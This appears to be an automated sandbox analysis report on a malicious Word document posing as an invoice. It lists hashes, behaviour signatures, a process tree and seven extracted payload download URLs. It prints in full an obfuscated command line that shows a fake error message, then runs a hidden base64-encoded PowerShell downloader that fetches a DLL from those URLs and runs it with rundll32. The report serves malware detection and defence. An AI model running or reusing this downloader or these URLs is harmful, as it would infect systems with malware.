Analysis
-
max time kernel
139s -
max time network
137s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
15-02-2021 15:02
Behavioral task
behavioral1
Sample
INV895212 200121.doc
Resource
win7v20201028
Behavioral task
behavioral2
Sample
INV895212 200121.doc
Resource
win10v20201028
General
-
Target
INV895212 200121.doc
-
Size
158KB
-
MD5
67c9e5cb7f3d94b57b015f898e47f7ae
-
SHA1
6b15c55ddc7bd8fd48847f99469e60cb8b376f63
-
SHA256
7b8c40801574e57e1e8ec63d7ef48d8072a41b95e548f7b140744017b2b3c0f3
-
SHA512
5bf584e06564664ea022cf992e6c54ee58ba91d1bf7e4dc31b9604ace0f99b9f6d441021fa6c9709b14762743806daae668d7eb4297be74890a7f8d3795d0f57
Malware Config
Extracted
http://zhongsijiacheng.com/wp-content/jn5/
http://artistascitizen.com/wp-content/Bx3cr6/
http://ombchardin.com/archive/V/
https://apsolution.work/magneti-marelli-zkkmb/toq7Eiy/
https://happycheftv.com/wp-admin/z6uGcbY/
https://careercoachconnection.com/tenderometer/4K/
https://tacademicos.com/content/JbF68i/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 344 68 cmd.exe -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 22 2988 powershell.exe 32 2988 powershell.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3940 rundll32.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 528 WINWORD.EXE 528 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2988 powershell.exe 2988 powershell.exe 2988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2988 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 528 WINWORD.EXE 528 WINWORD.EXE 528 WINWORD.EXE 528 WINWORD.EXE 528 WINWORD.EXE 528 WINWORD.EXE 528 WINWORD.EXE -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
cmd.exepowershell.exerundll32.exedescription pid process target process PID 344 wrote to memory of 3444 344 cmd.exe msg.exe PID 344 wrote to memory of 3444 344 cmd.exe msg.exe PID 344 wrote to memory of 2988 344 cmd.exe powershell.exe PID 344 wrote to memory of 2988 344 cmd.exe powershell.exe PID 2988 wrote to memory of 2384 2988 powershell.exe rundll32.exe PID 2988 wrote to memory of 2384 2988 powershell.exe rundll32.exe PID 2384 wrote to memory of 3940 2384 rundll32.exe rundll32.exe PID 2384 wrote to memory of 3940 2384 rundll32.exe rundll32.exe PID 2384 wrote to memory of 3940 2384 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INV895212 200121.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.execmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\msg.exemsg Admin /v Word experienced an error trying to open the file.2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -enc IABTAFYAIAAgACgAIgBPAGsAIgArACIAQQAiACkAIAAgACgAIABbAHQAeQBQAGUAXQAoACIAewA2AH0AewA0AH0AewAzAH0AewAwAH0AewA1AH0AewAxAH0AewAyAH0AIgAtAGYAJwBpACcALAAnAEkAUgBlACcALAAnAGMAVABvAHIAeQAnACwAJwBlAG0ALgAnACwAJwBzAHQAJwAsACcAbwAuAEQAJwAsACcAUwB5ACcAKQApADsAIAAgACAAIAAkAEEAWgAxAEMAIAAgAD0AIAAgAFsAdABZAHAAZQBdACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADQAfQB7ADAAfQB7ADUAfQAiAC0ARgAgACcAcABvAGkATgBUAG0AQQBuACcALAAnAGUAdAAuACcALAAnAEUAbQAuAE4AJwAsACcAcwB5AFMAVAAnACwAJwBzAEUAcgBWAGkAYwBFACcALAAnAEEARwBlAFIAJwApACAAOwAgACQAWQBsAHUANwB5AG8AcwA9ACQAWQBfADgAQwAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUQAyADAAVwA7ACQAUAA5ADQASgA9ACgAKAAnAFQANQAnACsAJwBfACcAKQArACcAQwAnACkAOwAgACgAIAAgAEQASQByACAAKAAnAFYAYQAnACsAJwByAEkAQQBCACcAKwAnAEwARQA6AE8AJwArACcAawBBACcAKQAgACAAKQAuAFYAQQBsAFUAZQA6ADoAIgBjAHIARQBgAEEAdABgAGUAZABJAHIARQBjAGAAVABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAdwBzACcAKwAnAEEAJwApACsAKAAnAEMAcwA0ACcAKwAnAGMAMwB2ACcAKQArACgAJwBsACcAKwAnAHcAcwBBAFUAJwApACsAKAAnAHAAeQB1AG0AJwArACcAOAAnACkAKwAoACcAMAAnACsAJwB3AHMAQQAnACkAKQAuACIAcgBFAFAAYABMAGEAQwBFACIAKAAoACcAdwAnACsAJwBzAEEAJwApACwAJwBcACcAKQApACkAOwAkAFYAMQA1AFcAPQAoACcARgA1ACcAKwAnADEARwAnACkAOwAgACgAIABHAGMAaQAgACgAJwBWAGEAUgBJAGEAJwArACcAQgAnACsAJwBMAGUAOgAnACsAJwBBAHoAMQBDACcAKQAgACkALgB2AGEATABVAEUAOgA6ACIAcwBlAGMAdQBgAFIAaQBgAFQAeQBgAHAAYABSAE8AVABPAEMAbwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsAHMAJwArACcAMQAyACcAKQApADsAJABVADEANABSAD0AKAAnAFQAJwArACgAJwA5ACcAKwAnADUARgAnACkAKQA7ACQARAA3AHMAaAA4AHgAZgAgAD0AIAAoACcASgAnACsAKAAnAF8AMwAnACsAJwBRACcAKQApADsAJABPADMANQBRAD0AKAAnAEUANQAnACsAJwA5AE8AJwApADsAJABVADEAawB0AGMANwBpAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AQwBzACcAKwAnADQAYwAzAHYAbAB7ACcAKwAnADAAfQAnACsAJwBVAHAAJwArACgAJwB5ACcAKwAnAHUAbQAnACkAKwAnADgAMAAnACsAJwB7ACcAKwAnADAAfQAnACkAIAAgAC0ARgAgAFsAQwBoAGEAcgBdADkAMgApACsAJABEADcAcwBoADgAeABmACsAJwAuAGQAJwAgACsAIAAnAGwAbAAnADsAJABXADYAOQBZAD0AKAAoACcARwAxACcAKwAnADcAJwApACsAJwBOACcAKQA7ACQATAByADIAaABzADkANwA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAEsAYQA3ADQAcAA1AGUAPQAoACcAcwAnACsAKAAnAGcAIAB5ACcAKwAnAHcAJwApACsAKAAnACAAYQAnACsAJwBoADoALwAnACsAJwAvACcAKQArACcAegAnACsAKAAnAGgAbwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAHMAaQBqAGkAJwArACcAYQBjACcAKQArACgAJwBoACcAKwAnAGUAbgBnACcAKwAnAC4AYwAnACkAKwAnAG8AbQAnACsAKAAnAC8AdwBwAC0AYwAnACsAJwBvAG4AdABlAG4AJwArACcAdAAnACkAKwAoACcALwBqAG4ANQAvACEAJwArACcAcwAnACsAJwBnACcAKQArACcAIAB5ACcAKwAnAHcAJwArACgAJwAgAGEAaAA6ACcAKwAnAC8AJwApACsAJwAvACcAKwAoACcAYQByACcAKwAnAHQAaQBzACcAKQArACgAJwB0AGEAJwArACcAcwBjACcAKQArACgAJwBpAHQAaQB6ACcAKwAnAGUAbgAuAGMAJwArACcAbwBtAC8AdwBwACcAKQArACgAJwAtAGMAbwAnACsAJwBuACcAKQArACgAJwB0AGUAbgAnACsAJwB0ACcAKQArACgAJwAvAEIAeAAzACcAKwAnAGMAcgA2AC8AJwApACsAKAAnACEAcwBnACcAKwAnACAAJwApACsAJwB5ACcAKwAnAHcAIAAnACsAKAAnAGEAJwArACcAaAA6AC8ALwBvAG0AJwArACcAYgBjAGgAYQByACcAKwAnAGQAaQBuAC4AJwApACsAKAAnAGMAbwBtAC8AYQByAGMAJwArACcAaAAnACkAKwAnAGkAJwArACgAJwB2AGUAJwArACcALwBWACcAKwAnAC8AIQAnACsAJwBzAGcAIAAnACsAJwB5AHcAIABhAGgAJwApACsAKAAnAHMAOgAvAC8AYQBwACcAKwAnAHMAbwBsACcAKwAnAHUAdAAnACsAJwBpAG8AJwArACcAbgAnACkAKwAoACcALgAnACsAJwB3AG8AcgAnACkAKwAoACcAawAnACsAJwAvAG0AYQBnAG4AZQAnACkAKwAnAHQAJwArACgAJwBpAC0AbQBhACcAKwAnAHIAJwArACcAZQBsAGwAJwApACsAKAAnAGkAJwArACcALQB6AGsAJwArACcAawAnACsAJwBtAGIALwB0AG8AcQA3AEUAaQB5ACcAKwAnAC8AJwApACsAJwAhACcAKwAnAHMAZwAnACsAJwAgACcAKwAoACcAeQB3ACAAJwArACcAYQBoAHMAOgAnACsAJwAvAC8AaAAnACkAKwAnAGEAJwArACgAJwBwAHAAeQAnACsAJwBjACcAKwAnAGgAZQAnACsAJwBmAHQAdgAuAGMAbwBtAC8AJwArACcAdwBwAC0AYQAnACsAJwBkAG0AJwApACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHoANgAnACkAKwAoACcAdQBHAGMAJwArACcAYgAnACsAJwBZAC8AIQAnACkAKwAoACcAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAaABzADoALwAnACsAJwAvAGMAYQByACcAKwAnAGUAJwApACsAJwBlAHIAJwArACcAYwAnACsAKAAnAG8AYQBjAGgAYwBvAG4AJwArACcAbgAnACkAKwAnAGUAJwArACcAYwAnACsAKAAnAHQAaQBvACcAKwAnAG4AJwArACcALgBjAG8AbQAvACcAKwAnAHQAJwArACcAZQBuAGQAZQByACcAKQArACgAJwBvACcAKwAnAG0AZQAnACkAKwAoACcAdABlAHIALwA0AEsAJwArACcALwAnACsAJwAhAHMAJwApACsAKAAnAGcAJwArACcAIAB5AHcAIABhACcAKwAnAGgAJwArACcAcwA6AC8ALwAnACkAKwAnAHQAYQAnACsAJwBjACcAKwAoACcAYQBkAGUAJwArACcAbQBpAGMAJwArACcAbwBzAC4AJwArACcAYwBvACcAKQArACgAJwBtAC8AYwBvACcAKwAnAG4AJwApACsAKAAnAHQAZQBuACcAKwAnAHQALwBKAGIARgA2ADgAJwArACcAaQAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBDAGUAIgAoACgAJwBzACcAKwAoACcAZwAgACcAKwAnAHkAJwApACsAKAAnAHcAJwArACcAIABhAGgAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAEwAcgAyAGgAcwA5ADcALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAUwBgAFAAbABJAFQAIgAoACQATwA1ADgATAAgACsAIAAkAFkAbAB1ADcAeQBvAHMAIAArACAAJABBAF8AOQBSACkAOwAkAFcAMAAwAFcAPQAoACcAWgBfACcAKwAnADYASgAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQBmAGMAdgBjADYAIABpAG4AIAAkAEsAYQA3ADQAcAA1AGUAKQB7AHQAcgB5AHsAKAAmACgAJwBOAGUAdwAtAE8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAFMAeQBTAFQARQBNAC4ATgBFAHQALgBXAEUAQgBjAEwASQBlAE4AdAApAC4AIgBEAE8AYAB3AG4AbABPAEEARABgAEYAaQBgAEwARQAiACgAJABOAGUAZgBjAHYAYwA2ACwAIAAkAFUAMQBrAHQAYwA3AGkAKQA7ACQATAAzADkAUQA9ACgAJwBIACcAKwAoACcAXwA1ACcAKwAnAEMAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVQAxAGsAdABjADcAaQApAC4AIgBMAGAAZQBOAGAARwBUAGgAIgAgAC0AZwBlACAAMwAzADUANwAxACkAIAB7AC4AKAAnAHIAdQBuAGQAbAAnACsAJwBsACcAKwAnADMAMgAnACkAIAAkAFUAMQBrAHQAYwA3AGkALAAoACgAJwBBACcAKwAnAG4AeQAnACkAKwAoACcAUwB0AHIAaQAnACsAJwBuACcAKQArACcAZwAnACkALgAiAHQATwBTAHQAYABSAGAAaQBOAGcAIgAoACkAOwAkAEoAOAAzAEsAPQAoACcATwAnACsAKAAnAF8AJwArACcANwBYACcAKQApADsAYgByAGUAYQBrADsAJABRADIANgBFAD0AKAAnAFIAXwAnACsAJwA0AEQAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABQADMANQBZAD0AKAAoACcAUAAnACsAJwAxADUAJwApACsAJwBVACcAKQA=2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll,AnyString3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dll,AnyString4⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dllMD5
782f98c00905f1b80f0dfc6dc287cd6e
SHA16575caf3d68d899e83c4b352e985f86b53e804c7
SHA25606040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf
SHA512cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6
-
\Users\Admin\Cs4c3vl\Upyum80\J_3Q.dllMD5
782f98c00905f1b80f0dfc6dc287cd6e
SHA16575caf3d68d899e83c4b352e985f86b53e804c7
SHA25606040e1406a3b99da60e639edcf14ddb1f3c812993b408a8164285f2a580caaf
SHA512cd2a5e6f9d9f22cbf2e215d74dde5dbae107e14ac356bf47dfa4a4f1dd00d9399bf073bf67139a83a4bb29cd6e7081f832348ba6183aefd7a1faafceae890ed6
-
memory/528-2-0x00007FFA91E20000-0x00007FFA91E30000-memory.dmpFilesize
64KB
-
memory/528-3-0x00007FFA91E20000-0x00007FFA91E30000-memory.dmpFilesize
64KB
-
memory/528-4-0x00007FFA91E20000-0x00007FFA91E30000-memory.dmpFilesize
64KB
-
memory/528-5-0x00007FFA91E20000-0x00007FFA91E30000-memory.dmpFilesize
64KB
-
memory/528-6-0x000001B1F6290000-0x000001B1F68C7000-memory.dmpFilesize
6.2MB
-
memory/2384-15-0x0000000000000000-mapping.dmp
-
memory/2988-10-0x000002D192CF0000-0x000002D192CF1000-memory.dmpFilesize
4KB
-
memory/2988-11-0x000002D1AB170000-0x000002D1AB171000-memory.dmpFilesize
4KB
-
memory/2988-12-0x000002D1AB060000-0x000002D1AB062000-memory.dmpFilesize
8KB
-
memory/2988-13-0x000002D1AB063000-0x000002D1AB065000-memory.dmpFilesize
8KB
-
memory/2988-14-0x000002D1AB066000-0x000002D1AB068000-memory.dmpFilesize
8KB
-
memory/2988-9-0x00007FFAAA820000-0x00007FFAAB20C000-memory.dmpFilesize
9.9MB
-
memory/2988-8-0x0000000000000000-mapping.dmp
-
memory/3444-7-0x0000000000000000-mapping.dmp
-
memory/3940-17-0x0000000000000000-mapping.dmp